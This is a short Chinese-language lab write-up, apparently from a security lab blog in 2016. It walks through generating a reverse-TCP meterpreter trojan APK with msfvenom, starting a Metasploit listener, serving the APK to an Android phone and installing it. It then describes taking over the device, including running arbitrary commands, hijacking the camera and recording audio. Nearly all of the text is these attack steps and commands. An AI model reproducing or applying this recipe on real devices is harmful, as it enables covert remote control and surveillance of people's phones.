实验环境:Kali Linux 2016.1;IP:192.168.0.105。
受害主机:华为Ascend P7 Android 4.x;IP:192.168.0.102。
实验过程:
1.运行msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105
LPORT=1234 R > test.apk;
![](https://img.haomeiwen.com/i2668818/95eec8b694a9366a.png)
2.运行msfconsole,输入use exploit/multi/handler;
![](https://img.haomeiwen.com/i2668818/3d08f5557386eb18.png)
3.执行set PAYLOAD android/meterpreter/reverse_tcp;
![](https://img.haomeiwen.com/i2668818/fd38a57a380a9334.png)
4.执行show options,将本地IP和端口号修改成和木马一样的参数;
![](https://img.haomeiwen.com/i2668818/014b3f7b20b0b417.png)
5.将test.apk通过Kali的apache服务器下载到受害主机上;
![](https://img.haomeiwen.com/i2668818/2fded7ff25210e11.png)
6.在metasploit中执行exploit,之后在安卓手机中安装test.apk;
![](https://img.haomeiwen.com/i2668818/50fd7de89463c15c.jpg)
7.可以看到,安装apk之后,我们得到了受害主机的meterpreter;
![](https://img.haomeiwen.com/i2668818/83034fb8ae9c6673.png)
8.我们可以在meterpreter下执行任何命令,例如检查是否root,列出当前进程,甚至劫持摄像头,录制声音等等。
![](https://img.haomeiwen.com/i2668818/1517cf0a1cedcd78.png)
![](https://img.haomeiwen.com/i2668818/fc4a8df4d4af6cc8.png)
![](https://img.haomeiwen.com/i2668818/72a271eb0121f476.png)
![](https://img.haomeiwen.com/i2668818/b80da50876e0190c.png)
![](https://img.haomeiwen.com/i2668818/6c13f6c98422e90f.png)
![](https://img.haomeiwen.com/i2668818/c8e19f4630d480f2.png)
![](https://img.haomeiwen.com/i2668818/de74d8d2d9f1e3a6.png)
Safesonic网络安全实验室2016年08月13日
网友评论